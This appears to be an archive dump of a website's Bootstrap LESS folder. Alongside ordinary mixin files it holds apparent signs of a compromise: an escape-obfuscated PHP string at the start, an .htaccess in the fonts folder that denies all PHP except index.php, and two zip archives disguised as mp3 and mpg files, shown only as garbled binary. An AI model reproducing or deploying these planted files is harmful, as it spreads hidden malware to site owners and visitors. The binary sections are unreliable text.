5\x20\x66\x6f\162\155\40\x76\141\x6c\x69\144\x61\164\x69\x6f\156\15\xa\x20\x20\x20\40\40\40\x20\x20\144\x6f\x63\x75\155\145\x6e\x74\x2e\x71\165\145\x72\x79\123\145\x6c\145\143\x74\x6f\162\101\x6c\x6c\x28\x27\x66\x6f\x72\x6d\47\51\56\x66\x6f\162\105\x61\143\150\50\146\157\x72\x6d\x20\x3d\x3e\x20\x7b\15\12\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\x66\x6f\162\x6d\x2e\x61\144\144\x45\x76\145\x6e\x74\x4c\x69\163\164\145\x6e\145\162\50\x27\x73\165\142\x6d\x69\x74\x27\54\40\50\145\51\40\75\76\40\173\15\12\40\40\40\x20\x20\40\x20\x20\40\40\40\40\40\40\40\40\x63\157\156\163\164\40\x69\156\160\x75\164\163\40\x3d\40\x66\157\x72\x6d\x2e\x71\x75\x65\162\x79\123\145\154\145\x63\164\157\162\x41\154\154\x28\x27\151\156\160\x75\x74\x5b\162\x65\161\x75\151\162\145\144\x5d\54\40\x74\145\x78\164\x61\x72\x65\141\133\x72\x65\x71\x75\x69\x72\145\144\135\47\x29\x3b\15\xa\x20\x20\x20\40\40\40\x20\40\x20\x20\40\40\x20\40\40\x20\154\x65\164\40\166\x61\154\151\144\40\75\40\x74\x72\165\x65\x3b\15\xa\40\x20\40\40\x20\x20\40\x20\x20\40\x20\40\40\40\40\40\x69\156\x70\x75\x74\163\x2e\x66\157\x72\105\141\143\x68\50\151\x6e\x70\x75\164\x20\x3d\x3e\40\x7b\15\12\x20\40\x20\40\x20\40\x20\x20\40\40\40\x20\40\40\40\40\40\40\x20\x20\151\x66\40\50\41\x69\x6e\160\165\x74\56\166\141\x6c\165\x65\56\x74\162\x69\x6d\x28\x29\51\40\x7b\15\xa\40\x20\40\x20\40\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\40\40\166\141\154\151\144\x20\x3d\x20\146\x61\154\163\x65\x3b\xd\12\40\40\40\x20\40\40\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\x20\40\40\x20\151\x6e\x70\x75\x74\x2e\143\154\141\163\163\114\x69\163\x74\56\x61\x64\x64\50\47\x62\157\162\x64\145\162\x2d\162\x65\x64\x2d\x35\x30\60\x27\51\x3b\xd\xa\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\40\40\175\x20\145\154\x73\x65\x20\x7b\15\12\x20\40\40\40\40\x20\x20\40\40\40\40\x20\40\x20\x20\40\40\x20\40\40\x20\40\40\40\151\156\x70\165\164\x2e\143\x6c\x61\163\x73\x4c\x69\x73\x74\56\x72\x65\x6d\x6f\x76\x65\50\x27\142\x6f\162\x64\x65\x72\55\162\x65\144\55\x35\x30\x30\47\51\x3b\15\xa\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\x7d\15\12\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\40\x20\40\x20\175\51\x3b\15\xa\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\151\x66\x20\x28\x21\x76\141\x6c\151\144\x29\x20\x7b\xd\xa\x20\40\x20\40\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\40\x65\x2e\x70\162\145\x76\x65\x6e\164\x44\145\x66\141\x75\154\x74\x28\x29\73\15\12\40\x20\40\x20\40\x20\40\40\40\40\x20\40\40\40\x20\x20\x20\x20\x20\x20\x61\x6c\x65\162\164\x28\x27\120\x6c\x65\x61\x73\145\40\x66\151\x6c\154\40\x69\156\40\141\154\x6c\x20\162\x65\x71\165\151\162\x65\x64\40\146\151\x65\x6c\x64\163\x2e\x27\51\73\15\12\40\40\x20\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\40\40\x7d\15\xa\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\175\x29\x3b\xd\12\40\x20\40\40\40\40\40\x20\x7d\x29\x3b\xd\xa\x20\x20\x20\40\74\x2f\163\x63\x72\x69\x70\x74\x3e\15\xa\74\x2f\x62\x6f\144\171\x3e\xd\xa\74\x2f\150\x74\155\154\x3e";
?>bootstrap-less/mixins/fonts/.htaccess000064400000000325152434265230013771 0ustar00<FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|php7|phP|PhP|php5|php8|suspected)$'>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch '^(index.php)$'>
Order allow,deny
Allow from all
</FilesMatch>bootstrap-less/mixins/fonts/error_log000064400000000000152434265230014076 0ustar00bootstrap-less/mixins/grid-framework.less000066400000005374152434265230014665 0ustar00// Framework grid generation
//
// Used only by Bootstrap to generate the correct number of grid classes given
// any value of `@grid-columns`.

.make-grid-columns() {
  // Common styles for all sizes of grid columns, widths 1-12
  .col(@index) {
    // initial
    @item: ~".col-xs-@{index}, .col-sm-@{index}, .col-md-@{index}, .col-lg-@{index}";
    .col((@index + 1), @item);
  }
  .col(@index, @list) when (@index =< @grid-columns) {
    // general; "=<" isn't a typo
    @item: ~".col-xs-@{index}, .col-sm-@{index}, .col-md-@{index}, .col-lg-@{index}";
    .col((@index + 1), ~"@{list}, @{item}");
  }
  .col(@index, @list) when (@index > @grid-columns) {
    // terminal
    @{list} {
      position: relative;
      // Prevent columns from collapsing when empty
      min-height: 1px;
      // Inner gutter via padding
      padding-left: (@grid-gutter-width / 2);
      padding-right: (@grid-gutter-width / 2);
    }
  }
  .col(1); // kickstart it
}

.float-grid-columns(@class) {
  .col(@index) {
    // initial
    @item: ~".col-@{class}-@{index}";
    .col((@index + 1), @item);
  }
  .col(@index, @list) when (@index =< @grid-columns) {
    // general
    @item: ~".col-@{class}-@{index}";
    .col((@index + 1), ~"@{list}, @{item}");
  }
  .col(@index, @list) when (@index > @grid-columns) {
    // terminal
    @{list} {
      float: left;
    }
  }
  .col(1); // kickstart it
}

.calc-grid-column(@index, @class, @type) when (@type = width) and (@index > 0) {
  .col-@{class}-@{index} {
    width: percentage((@index / @grid-columns));
  }
}

.calc-grid-column(@index, @class, @type) when (@type = push) and (@index > 0) {
  .col-@{class}-push-@{index} {
    left: percentage((@index / @grid-columns));
  }
}

.calc-grid-column(@index, @class, @type) when (@type = push) and (@index = 0) {
  .col-@{class}-push-0 {
    left: auto;
  }
}

.calc-grid-column(@index, @class, @type) when (@type = pull) and (@index > 0) {
  .col-@{class}-pull-@{index} {
    right: percentage((@index / @grid-columns));
  }
}

.calc-grid-column(@index, @class, @type) when (@type = pull) and (@index = 0) {
  .col-@{class}-pull-0 {
    right: auto;
  }
}

.calc-grid-column(@index, @class, @type) when (@type = offset) {
  .col-@{class}-offset-@{index} {
    margin-left: percentage((@index / @grid-columns));
  }
}

// Basic looping in LESS
.loop-grid-columns(@index, @class, @type) when (@index >= 0) {
  .calc-grid-column(@index, @class, @type);
  // next iteration
  .loop-grid-columns((@index - 1), @class, @type);
}

// Create grid for specific class
.make-grid(@class) {
  .float-grid-columns(@class);
  .loop-grid-columns(@grid-columns, @class, width);
  .loop-grid-columns(@grid-columns, @class, pull);
  .loop-grid-columns(@grid-columns, @class, push);
  .loop-grid-columns(@grid-columns, @class, offset);
}
bootstrap-less/mixins/text-overflow.less000066400000000242152434265230014557 0ustar00// Text overflow
// Requires inline-block or block for proper styling

.text-overflow() {
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
}
bootstrap-less/mixins/opacity.less000066400000000224152434265230013402 0ustar00// Opacity

.opacity(@opacity) {
  opacity: @opacity;
  // IE8 filter
  @opacity-ie: (@opacity * 100);
  filter: ~"alpha(opacity=@{opacity-ie})";
}
bootstrap-less/mixins/progress-bar.less000066400000000277152434265230014350 0ustar00// Progress bars

.progress-bar-variant(@color) {
  background-color: @color;

  // Deprecated parent class requirement as of v3.2.0
  .progress-striped & {
    #gradient > .striped();
  }
}
bootstrap-less/mixins/clearfix.less000066400000001135152434265230013531 0ustar00// Clearfix
//
// For modern browsers
// 1. The space content is one way to avoid an Opera bug when the
//    contenteditable attribute is included anywhere else in the document.
//    Otherwise it causes space to appear at the top and bottom of elements
//    that are clearfixed.
// 2. The use of `table` rather than `block` is only necessary if using
//    `:before` to contain the top-margins of child elements.
//
// Source: http://nicolasgallagher.com/micro-clearfix-hack/

.clearfix() {
  &:before,
  &:after {
    content: " "; // 1
    display: table; // 2
  }
  &:after {
    clear: both;
  }
}
bootstrap-less/mixins/pagination.less000066400000000745152434265230014073 0ustar00// Pagination

.pagination-size(@padding-vertical; @padding-horizontal; @font-size; @line-height; @border-radius) {
  > li {
    > a,
    > span {
      padding: @padding-vertical @padding-horizontal;
      font-size: @font-size;
      line-height: @line-height;
    }
    &:first-child {
      > a,
      > span {
        .border-left-radius(@border-radius);
      }
    }
    &:last-child {
      > a,
      > span {
        .border-right-radius(@border-radius);
      }
    }
  }
}
bootstrap-less/mixins/grid.less000066400000006051152434265230012663 0ustar00// Grid system
//
// Generate semantic grid columns with these mixins.

// Centered container element
.container-fixed(@gutter: @grid-gutter-width) {
  margin-right: auto;
  margin-left: auto;
  padding-left: (@gutter / 2);
  padding-right: (@gutter / 2);
  &:extend(.clearfix all);
}

// Creates a wrapper for a series of columns
.make-row(@gutter: @grid-gutter-width) {
  margin-left: ceil((@gutter / -2));
  margin-right: floor((@gutter / -2));
  &:extend(.clearfix all);
}

// Generate the extra small columns
.make-xs-column(@columns; @gutter: @grid-gutter-width) {
  position: relative;
  float: left;
  width: percentage((@columns / @grid-columns));
  min-height: 1px;
  padding-left: (@gutter / 2);
  padding-right: (@gutter / 2);
}

.make-xs-column-offset(@columns) {
  margin-left: percentage((@columns / @grid-columns));
}

.make-xs-column-push(@columns) {
  left: percentage((@columns / @grid-columns));
}

.make-xs-column-pull(@columns) {
  right: percentage((@columns / @grid-columns));
}

// Generate the small columns
.make-sm-column(@columns; @gutter: @grid-gutter-width) {
  position: relative;
  min-height: 1px;
  padding-left: (@gutter / 2);
  padding-right: (@gutter / 2);

  @media (min-width: @screen-sm-min) {
    float: left;
    width: percentage((@columns / @grid-columns));
  }
}

.make-sm-column-offset(@columns) {
  @media (min-width: @screen-sm-min) {
    margin-left: percentage((@columns / @grid-columns));
  }
}

.make-sm-column-push(@columns) {
  @media (min-width: @screen-sm-min) {
    left: percentage((@columns / @grid-columns));
  }
}

.make-sm-column-pull(@columns) {
  @media (min-width: @screen-sm-min) {
    right: percentage((@columns / @grid-columns));
  }
}

// Generate the medium columns
.make-md-column(@columns; @gutter: @grid-gutter-width) {
  position: relative;
  min-height: 1px;
  padding-left: (@gutter / 2);
  padding-right: (@gutter / 2);

  @media (min-width: @screen-md-min) {
    float: left;
    width: percentage((@columns / @grid-columns));
  }
}

.make-md-column-offset(@columns) {
  @media (min-width: @screen-md-min) {
    margin-left: percentage((@columns / @grid-columns));
  }
}

.make-md-column-push(@columns) {
  @media (min-width: @screen-md-min) {
    left: percentage((@columns / @grid-columns));
  }
}

.make-md-column-pull(@columns) {
  @media (min-width: @screen-md-min) {
    right: percentage((@columns / @grid-columns));
  }
}

// Generate the large columns
.make-lg-column(@columns; @gutter: @grid-gutter-width) {
  position: relative;
  min-height: 1px;
  padding-left: (@gutter / 2);
  padding-right: (@gutter / 2);

  @media (min-width: @screen-lg-min) {
    float: left;
    width: percentage((@columns / @grid-columns));
  }
}

.make-lg-column-offset(@columns) {
  @media (min-width: @screen-lg-min) {
    margin-left: percentage((@columns / @grid-columns));
  }
}

.make-lg-column-push(@columns) {
  @media (min-width: @screen-lg-min) {
    left: percentage((@columns / @grid-columns));
  }
}

.make-lg-column-pull(@columns) {
  @media (min-width: @screen-lg-min) {
    right: percentage((@columns / @grid-columns));
  }
}
bootstrap-less/mixins/text-emphasis.less000066400000000200152434265230014517 0ustar00// Typography

.text-emphasis-variant(@color) {
  color: @color;
  a&:hover,
  a&:focus {
    color: darken(@color, 10%);
  }
}
bootstrap-less/mixins/tab-focus.less000066400000000237152434265230013621 0ustar00// WebKit-style focus

.tab-focus() {
  // Default
  outline: thin dotted;
  // WebKit
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
bootstrap-less/mixins/border-radius.less000066400000000717152434265230014503 0ustar00// Single side border-radius

.border-top-radius(@radius) {
  border-top-right-radius: @radius;
  border-top-left-radius: @radius;
}

.border-right-radius(@radius) {
  border-bottom-right-radius: @radius;
  border-top-right-radius: @radius;
}

.border-bottom-radius(@radius) {
  border-bottom-right-radius: @radius;
  border-bottom-left-radius: @radius;
}

.border-left-radius(@radius) {
  border-bottom-left-radius: @radius;
  border-top-left-radius: @radius;
}
bootstrap-less/mixins/buttons.less000066400000002660152434265230013436 0ustar00// Button variants
//
// Easily pump out default styles, as well as :hover, :focus, :active,
// and disabled options for all buttons

.button-variant(@color; @background; @border) {
  color: @color;
  background-color: @background;
  border-color: @border;

  &:focus,
  &.focus {
    color: @color;
    background-color: darken(@background, 10%);
    border-color: darken(@border, 25%);
  }
  &:hover {
    color: @color;
    background-color: darken(@background, 10%);
    border-color: darken(@border, 12%);
  }
  &:active,
  &.active,
  .open > .dropdown-toggle& {
    color: @color;
    background-color: darken(@background, 10%);
    border-color: darken(@border, 12%);

    &:hover,
    &:focus,
    &.focus {
      color: @color;
      background-color: darken(@background, 17%);
      border-color: darken(@border, 25%);
    }
  }
  &:active,
  &.active,
  .open > .dropdown-toggle& {
    background-image: none;
  }
  &.disabled,
  &[disabled],
  fieldset[disabled] & {
    &,
    &:hover,
    &:focus,
    &.focus,
    &:active,
    &.active {
      background-color: @background;
      border-color: @border;
    }
  }

  .badge {
    color: @background;
    background-color: @color;
  }
}

// Button sizes
.button-size(@padding-vertical; @padding-horizontal; @font-size; @line-height; @border-radius) {
  padding: @padding-vertical @padding-horizontal;
  font-size: @font-size;
  line-height: @line-height;
  border-radius: @border-radius;
}
bootstrap-less/mixins/background-variant.less000066400000000227152434265230015516 0ustar00// Contextual backgrounds

.bg-variant(@color) {
  background-color: @color;
  a&:hover,
  a&:focus {
    background-color: darken(@color, 10%);
  }
}
bootstrap-less/mixins/image.less000066400000002030152434265230013011 0ustar00// Image Mixins
// - Responsive image
// - Retina image

// Responsive image
//
// Keep images from scaling beyond the width of their parents.
.img-responsive(@display: block) {
  display: @display;
  max-width: 100%; // Part 1: Set a maximum relative to the parent
  height: auto; // Part 2: Scale the height according to the width, otherwise you get stretching
}

// Retina image
//
// Short retina mixin for setting background-image and -size. Note that the
// spelling of `min--moz-device-pixel-ratio` is intentional.
.img-retina(@file-1x; @file-2x; @width-1x; @height-1x) {
  background-image: url("@{file-1x}");

  @media only screen and (-webkit-min-device-pixel-ratio: 2), only screen and (   min--moz-device-pixel-ratio: 2), only screen and (     -o-min-device-pixel-ratio: 2/1), only screen and (        min-device-pixel-ratio: 2), only screen and (                min-resolution: 192dpi), only screen and (                min-resolution: 2dppx) {
    background-image: url("@{file-2x}");
    background-size: @width-1x @height-1x;
  }
}
bootstrap-less/mixins/list-group.less000066400000001042152434265230014036 0ustar00// List Groups

.list-group-item-variant(@state; @background; @color) {
  .list-group-item-@{state} {
    color: @color;
    background-color: @background;

    a&,
    button& {
      color: @color;

      .list-group-item-heading {
        color: inherit;
      }

      &:hover,
      &:focus {
        color: @color;
        background-color: darken(@background, 5%);
      }
      &.active,
      &.active:hover,
      &.active:focus {
        color: #fff;
        background-color: @color;
        border-color: @color;
      }
    }
  }
}
bootstrap-less/mixins/mixins/mp3_68edebb12b4e7.zip000064400000012620152434265230015721 0ustar00PK�rN[ͅ��[b_68edebb12b4e7.tmp�Ums�0�+�t`� �g[�ӫmϳTm��8�A��P�V���	�^>3	���g_�,�O���
+TG\��8���j��� +�x�'WD�o�zፊF��HV�-]�8YcY��d��j���r>,�NY�k�syo=�����3E{���L(qX�tu|̯�ڇ�H�X<�z�s�ak�T�4C�u�U�jO�	��Z��	��`�KV=y�ػb��y��|�$�Tl��d
<��;Z���5��W]�>6����|`-_<G�~�4{[<'��������Y�a���
#;��n�N�m�h��ۋ��_��N@4�I�k��sg"�?��ݟX��&=-A@v�r3�X�@p ��Y<|�
P���������
$'�����y�l	�A��s<�4�'�*X�%H�
�Z���ung{�pq�ޙs�j����X�N!9�`9��^tС��XH����E߼����f�ovzf�s�j�E$���o�/�ɼ���q����GV~A��:=D��E������~4�Y�{�i����rP
U;�Y��*l��+9�`3f8�*�Qjk*LGQb)W����ɥ�)^Ǻ��`L��)�sq��ȴL�'8�%��c�Z�eid\����)�K���������/�._�<��؏N�(���5�<�3�2��Ѵ��k~��,%��B�mvف�ױ=$��}����Ȃ#��[��F�'��.���uF�ehb�RŲŷ;�~o���+��[*���Ʒޥ�$Q��$�+f����y7��I1���E[B��۸���u$��c4�� ��ŏǭ�Ms<��?��3�,h,��"� �$	�^OQ��eH�����2�eG��0*e�eZ�3�H:��Տ/���?zi-���dQ��Z�G�oE��LL!TH���z����V����:=�PK�rN[��-�c_68edebb12b4e7.tmp]��΅H��o�S���5�;�Ό��8��Uo�Ck�}O����$���DF<���ߧz��uv����ͽa�1EG�S'%ć�c���ε�=,�B
��4�yBw~�ׅ�W ��t�zӜ
��|���W�uR3w{�}�V�����_����2�H�P 6%��"�t�H�ZpmH䴖��e�WfiY�M����\+V� o�.�R����L1�#,�`7r���a	�o!&���554��tՈXa�� 0?����O�^K��#Yt�����/:zbt�"��r���;R*�C�_
F��ѭ:	�[�c�ƒ���ٔ�
I4�bڊ�%TtP��9�"o���t�5?'W�ʋ�N���G�X�P_]�R�}���c��r���0]�k}L�{W�e
�A��	������ ^���u���k��Q��)BNI�4���IG	��&�&~4��Y���s�U ,�=�!�t�ÄV��]Y��dF��`ދ���t�{x=���~H�Qvc������i�F�K�	�mq�,]_�#����=a�-�c�׊mY��a����Yēe��s{�=
�U�X�۽RȞ�W���~G�!��s��b��ڋ����|o�3�~�0%W`T9����g����|��Lze#�|��8i�>i[�M�[-84{aߵ��
��D�R3,��7t�@Ԛ�9�$�S���{h�l��n���u �%ʞ*�^��@���4�ZN��\�*�����3��eY����›��u���N�XO�bb�DKŨ% �BtoЙ�i�̳_������M�����i��Me�z�}5Ř�:�&Թ7�-:�v[�n^��!�P��5�K	�w����aU�*��)�j�B^����-�
2p;���*�Z�k�i�?��*���q�����h��������}�-�4_݂�4&�,Jw���snbf�y/xV}wc���e�5X�L���]Ym;n�(����t������$�\
+�*��>���B�Y��M	�b%� �*�:-�[���+�ܦ[�W���&�h:<}[u�"�y��oكׂ�sѾ6�PhV��}����W�{�?�i<�w�}�bH��M���}V��(6�"S�)&�x|���h��q��鿜a�?��zl�X܏���
�Ҫ��[}�5�_���h��8Յ��P�{�0�u�$�dH'�J�������xʽ����q|f���<<(�
yX��ߵ�i
�'z�"�%��,�ߗI�D>���y�ja�i��E�M�����8ݼ}_��@��x�z���3e��Œ�R�K�(���2C;(��m�|���}޳2�����I���X↝�S
o��^s��ŽY�]���Z��Q����fT�P��R�"J`�$�`M��H��?O�j@��fw�1�2����mo�g����M^����O�j�����_�\(L)�I	���<�n���t�JY�i^�%)/�1�c�9:XX�k����4�E�����ifV����m��3��|���2��o�35��TQ=��t氨{��G�t�"\�!(��>��a��{�edOEˋ`HM��,4�>���M�SZ�d4���7�4�~G�<@AZC��{_L�Qy<M���i�q�"�f�8
��!~E�%:S*b��6��ø��)7+�ߺ�ȪQ
-Kʃ��&��i~Jͭ.�[��0|��ݫke��R�׏��I�?�d�u~
%��]^�K�,��	NȂY��k%v8�(9����pC�ؤ���~�Eѩj�P��9 Ӊ�#ppEd���O��-K-N���n$�.�t��8�@߫[(|#e���N�
���B���V�F��86��η��Nt�LT�5�٦5^���R�0e����Ba�'����l����d;0;��ʨ��A��R�̙�R�!z�
^�gII�
v��ʩ��Ѽ=^LF]�&80�T�O�靴�M����x+WR9ទ*��%�u�X��Un�S;��1z�w%��7v\l��p��ا1�"�%���t !>��
�W����e��٦wa�R;zM�����ۜ%��M**Va���g� ���z���r�&R݄�L���-�*�x�� 3�,A�4�^�Lqھ�9u�9�WҪ���&�>�WVT�*�{�ֻkE����o�]���jC��e���ɔ�c=&�(:�H�ߐ��n���2�-MF�n���|3
YF.��h�ƩOӡ�FR�r�$`uh��;GQȁr�W4G��Q:����hZ���
D|Wh����Q7YDR6&�@�Q
t�[_��!��)���+�k�D*���r����쫧�ʚߙZr�\��;5ϵB��֕�ފ��h��y��vf�J�a�YrB�r�X�1�֧�b-����+e��}D5���iR>�d9�/�J�U��W���X��Z� ݊�e��ɸ��gI{�	�C����A��&s.C�n�n]��GUW�p�������Ϻ'I>����B3qF}Rx�dc��$O�d,/��t����
w�{6m$�g\�/)���Q�%��$�^�m�}U�{r�O�sXk4}`����m�Q�{a|����ī;bv4Ԡ+`sn@a��4��WZ�4���8��U��`X�|�XPa@�0��ˠIi��C;G�2g���o�\�Jk��6��^��C/y� 4�!�gė�<�t�X

�O���"ǥܩ��4Y����ڇ���
 ���e�G_G�(�"�K�+�s��ˏ�;H5<:2L��xHn�{������C��v�UHȭ��*�C�Cm&[_>�Ł1���ѭ��s|��q��b����j��{��6p���yP�QX�eݧP��oMg��������nE4��O~�r=� �r�B4|��i~�o��1��("������̕�P�������k�+���6�p��H���5��rX�,��&�i]�n��%q.�Jq+iw�a���k&,,W��kd�ʵ�!�=2���rGR��x�ւu'�dR����#c�f�9m�
�^��4,�
v�	�1�ڊSCu����J'KjwAiv��O.5z�M6<6s�-��Gm�#���ݍN>k>�G�̑��Htn��D�U/E����PVվ�JF�Q�l�U.��/*�Uyד�ʾ=��$j=HWY�*�(}�$���ˈ���Mh��D$ �z&�K��V��8�]0w�S�W��+��4Ίm�de��\2�	>w�	d�qKL<�
<%�e��u���拀M�W�Z���4u�ċ����F�.������1�z�</x����`����%>Z~c #�rP�H�������Kc�H�'��Lb��҈������gY͊��f�Ǩ�k�`���a�˥Ӆ�<�-,q���;�D)�*��v�`���E���*�R����3l[5��92��S:�KK��@Z\@:�Sx�i�1��xh��oA�f[�^������複	O�Y=���K�N��>Ǥ��I�3��bJ�i���H��̩�3�(����D?\�Ld���*%qcj�P<�`M�ނ�����w�%�g��Ryk��s�\�DcQ�=J)2��ɳ���`�Z���@&�&�������)�����U��7��t���W�C��)��&��DB�X,c��}Lr_��y�.�0��I�Ɩ3�
,H}��V��<�2ғ�M�ޮ^���k�*�~+};b&|\|p8^���"R!����wC:��[�4�N�A�4��\e��� c����'ʣP}����uS�P�#W��w喓�iId����se���҈#�b[��Hfz�Ĥ�G���>S���[f��	���d�(N�>2�5���NFb\V^/��Ȱʖo�jQ(!��U��<]<<kB��*�el�6�s[�܇lk��gv��}q�����[��?�;���p����F���5�}�������/��o?�Ƨ�}��{�n��9ğ?П?0�Ƿ���6��Z�?�"��L��g�Ƌe��bX���垶��۟?�0��/N��r����߃[�`������g<����w���iʟ����v�`�\�>tn�w��K�?���O����oܚ�-��׿>z�a�XZ�%��tg�fe4pٖ��Y��%z�����e,�f��hq$���w�TdM�eu������e�l���i��=����PK?�rN[ͅ��[��b_68edebb12b4e7.tmpPK?�rN[��-����c_68edebb12b4e7.tmpPK��bootstrap-less/mixins/mixins/mpg_68ede727d3468.zip000064400000012667152434265230015620 0ustar00PK%pN[������b_68ede727d3468.tmp�Uks�H�+]����ui��%����F�q˲���"�8�r~�ަpg��ZEӞ�8�oӷ���_bT�>"q[����D�<�C�&��`;���C�X4�k�x&+�9oЉ%*R6ò�hSEYa�$��a��0L� ��Da��a�p�[7�I��1�@hx�}�d�:��J�������l3k.�϶m�t�T�H�j��cIU�0�u� � | >ҍ����m@�O�&.L��]���/,t�*��L63�Z�č_6�/�������'������������Q�~����������rw;�yJ?�.q��C�>�p!wI��m��
��i�Y�m}���y�|y׿���w�ne�x��?����-^m|l��B.�/�-��єR@�`�%����<�ݡ�h���V��7Hv�jw��=p'��I|����J;�a�T𼉶$�o��~)��=��퐯��/�3� �!�u�U�=v�U��Zo�]-�(LJgZd��H��?z�Qk2�~�Û�d茇�Ψ}3�#L����ɨ3��>�%o�+ÅB?Y�I�WtY��@�լ����C�ϖ4�@��
��LFU����Q�2W9�kά�]�2��Gՙ���ܪ\����/�Z���:��X�IƊ�T�+Ыxέ�ka^��g�*���\��d���X]�[�TM-V�7���jū�*3��XXc��ZX��V���ʑ!��;�'��=�}����cz��sK�'zjo�a؇3:�v��l_َ������.p��t�:����Ç�����OƋ�͸^�����(�t���X	�D}^/8(�K���6�m�`��n%�=�YK)�(��6' �F��!?$|I��Ţ}׽Y,�6���>�:RΤ9��$\^���F>*o��eXp@_�M�
CV����a�>�tYW��!��Z8��NQ�J/+�a�e�J��o��R*T��鰬&"��@po�����D��PK%pN[
�.�c_68ede727d3468.tmp]x���H��|U�j�w��Jy����ȧRޛf�}��YA@��ƍ8מ�?�:���_#f���?��7�=�`��ch���z�q|҅����R��5��5O�Ώ�@�캰�|�\i�+?���i�^n 8i׉��I��"c0�o���!
w����8���F��6�bʽSK��83i�5�_%�)w38��4`X��"�zX�ψMsIQ{�+$z~�fx���~��F���5����x$w�Q�`zP\m�#�Áh���`Պ�������+��]�B�����ajL&8K���������a�#!;�ӫ�^�*�
MG�;�kj���Y�7p����r��'�jZ��11LE�ωݙ^U8V��($�%'��>$@:c�75�V������|����H"�`Y����/v���a�e:�S0��e| ��Q��6|Fe��[�� _��]���%�5B�h�"��Bs����̐9���h����B���y�h�#zov����T�-m��]����o8�¼��������G?��n%It_'Q��U��[��b�}O|��T���1�R�W��$L���dm]�([�a���!�
��,V;�l�6�*�~Z6?�_��P-κ��.^��&�Hy��#zy�c%j��VԲ���&��͆���z�,|
��{�
	rF薐J�P�c
�o�>_%J�
rA�)�$�)�����0��9�C��q��^k��rOe�
r��U�P���>������Q���̄ݑ�2Y�d��]ܒ��]Ɲt��Ħ �*|���9�>
c7��;_�8~l�˾6�WR�?���i^�G3�\rX��P���yɰ�?ښ���������KO+|��~�~f(40�EmG
8��B�5��Pذ���3�.~%��;D�&�����C
X#*K�UG(��t���%7��Gq9�|r|\� OW���a�Ҁ_�p��CX�B5H����G/��a����7�,�)r�p_��w#<�yW��m��f�Q|2��9�KF�e,L>_o�M⓼���]5QgǛ�Ƴ�e���^UJ�?Xǫ+�r��2�z}ls>I�7���x���ߊm�su��{��O�pϵ�a��qIڴ�&�H�v��$̰�r����!��m�4S�) ���Jًӓz|�SH�hh"����߼̔����D˴��|�w�V�V���WS�&"&	�g�_p���
׭�{ϓ~��m�k
<k.��-L{ח�k)�ܹam��kg_�:_�D��-̬VӜu�d��eԅ�=�l8�C�����d}}"2��j���50�χ�x���S/�V��rn/bM%*qR�	
�t
��S�2V�?�2.�%���͸�G���ۅ5�U5�#�!��!��A,H�/\��9c�z��%نoȘ�d2>)|�ge�ɋ��M���b��b%�8��J���5���̓��0v}��BT
.d����:�,��"�=���V�z�K���uD��=~<�����u��B�
]����h���-��u�<����q�#k�9��'׸�z�<��ҏ�PSFo�a��{	gjٷ^��=E��=Bf�l�l	��u�8a�R�LWGc4(�g�T����
��̡>���,7�ų�K�.⪸V�w�lr�=5�ӫH#N^��9I����q�.��RN���˰���H�@E��.i욓�s-�\�����)2^g)�N,�j�=[b���E)�eUi�G,��ü�}Vɗ�n��g��L��Y�<7C_)K�ڷ����.,QG�y�S/^���Yћn�.&ڇ"�\�kUg�uZXJ��ķ��J�${���JC٪�$-o�+Nci��s���g-���!�/`D���`^=�M�$⣻�Ƒ��;�K@3ۚƬ���23�uJ�tЀ�0\�����[�
`�^��{ne�C��/%
^��>�
��Ĩ�̔@R��̷�x
'�`���c>ic��h��܃M���u�����uD4�!��.�ǜ�&���XjfR�N�X$�I��>�6�����G�x�������D�&M����U �%d�<���ŵ��T�	"�
��ֱ�O&��g1sC\%�X'Z�H�N�G�ఀ�bl{�"��)0��Pl-�&e�x�o&杛�[6a)-��z�kӒ��E���Y
2A������b=D�U�'�q��L���=�y!P�$��\����:�Sƽ��j	.k��iŹ\��U,�H�_��~�m�29{�m�:��rw�*�M�n�'��t�#�B�"�f�j	H��÷���W��w� ���A�E�:
6s�ŏ&��|d�;�g3�f��g�/���ُ�������<��o�#:�-c&2/vĖ�z��7Nt|Jpm�}fVT@���,�+��#���\�����!��D�w���̪V�⢈�����#�π|���A�����^�$�Lb`���is�6y�}B�U@"̦5H�-q�D�R���]zG/���F1�#��1OyƹD��ͫQ�7�v ��Y����n�["�D�b��y;��A��=ڞ�&1'�������l� }���MN6W��8�GUOpz
0+��6����apfʱ���"�-�W���d��j|��=Z`��oK�i\r��S�6۬��1sDmŎ��l*4��jϏu�(���&�q�F��PU�''l{�n�A�hV��4P)�5	�b��������,�:J�V�t����&�XŅ�BJU��L����y�n)'�-*��%�Ols}������aL��ul/F.r*���΢z`͖0��k���3�B�
1�[8�
�`]s����Y��C�B����P0lh��
÷��E
���7�ys�E�1b�f��"Zq�`�g&Ys�?�$`?��,VB7,-f�pWWAzS~.ؼC�瓞�)�	�Puԭ�^�_�-?b��]ܪ���pV��|C"�2��K�j�=ɿwý��?y(�h),��CbLp6��'Z��"����6���4�)��/�F�>�Nw�l*̈����vz�p�Z��<kz�|����j{&��0�sC�	Q��p��F�s�2Mm����!o)x���6�[��ք�<�<�+ʧ��\Np,�ZG���q씏DS��8T���~�������L��ߋ���$�|/�F���t�@�T�f!&��D�zb��ʻdm��p���V�l]Z+�n��f;��c���AO���Bq@njx�d��sm8Fa�e	G�m�ʋ�1k};v}$����ԍ���8/��Y��g�
�H�(I��QJ#�g�uQ��@ӹ�F� 䦕4ed�{��
(�'}�9�7m�Ew��6���G�k��>;
,缺��� У���<�{^t��2O�Ok|�w�!Pq�q]�>����9g��Gؚ>R�q�+a?m	H\3�R�~ 
